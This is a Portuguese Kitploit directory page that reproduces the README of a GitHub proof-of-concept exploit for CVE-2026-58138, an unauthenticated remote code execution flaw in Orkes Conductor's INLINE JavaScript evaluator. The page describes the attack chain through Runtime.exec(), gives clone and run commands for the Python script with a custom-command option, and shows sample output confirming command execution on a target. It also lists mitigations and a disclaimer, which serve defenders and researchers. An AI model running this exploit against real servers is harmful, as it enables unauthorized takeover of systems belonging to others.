Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE não autenticado via avaliador INLINE GraalVM | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE não autenticado via avaliador INLINE GraalVM

Ver Repositório
3há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) Execução Remota de Código Não Autenticada

Orkes Conductor

Vulnerabilidade Crítica de Execução Remota de Código no Orkes Conductor

CVE Exploit Python


📋 Visão Geral

CVE-2026-58138 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada que afeta o Orkes Conductor nas versões 3.21.21 a 3.30.1. Esta vulnerabilidade permite que atacantes executem comandos arbitrários no servidor Conductor sem exigir qualquer autenticação, podendo levar ao comprometimento total do sistema.

🔴 Severidade

  • Pontuação CVSS: 9.8 (Crítica)
  • Vetor de Ataque: Rede
  • Autenticação: Nenhuma Requerida
  • Impacto: Comprometimento Total do Sistema

⚙️ Detalhes da Vulnerabilidade

A vulnerabilidade existe no tipo de tarefa INLINE no mecanismo de fluxo de trabalho do Orkes Conductor. A tarefa INLINE suporta avaliação de JavaScript com acesso a objetos Java via eval, permitindo que um atacante:

  1. Registre um fluxo de trabalho malicioso contendo uma tarefa INLINE com código JavaScript
  2. Execute código Java arbitrário por meio da interoperabilidade Java do JavaScript
  3. Execute comandos do sistema no servidor Conductor via java.lang.Runtime.exec()

📦 Versões Afetadas

Intervalo de VersõesStatus
3.21.21 - 3.30.1✅ Vulnerável
> 3.30.1❌ Corrigida

🚀 Instalação

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💻 Uso

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 Exemplo de Saída

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ Mitigação

  1. Atualize para o Orkes Conductor 3.30.2 ou posterior
  2. Desative o tipo de tarefa INLINE se não for necessário
  3. Restrinja o acesso de rede à API do Conductor

⚠️ Aviso Legal

Apenas para fins educacionais e de pesquisa em segurança. Use somente em sistemas que você possua ou para os quais tenha permissão explícita de teste.


📚 Referências

  • NVD - CVE-2026-58138
  • Segurança do Orkes Conductor

⭐ Achou isto útil? Dê uma estrela no GitHub ⭐

GitHub stars

Baixar ferramenta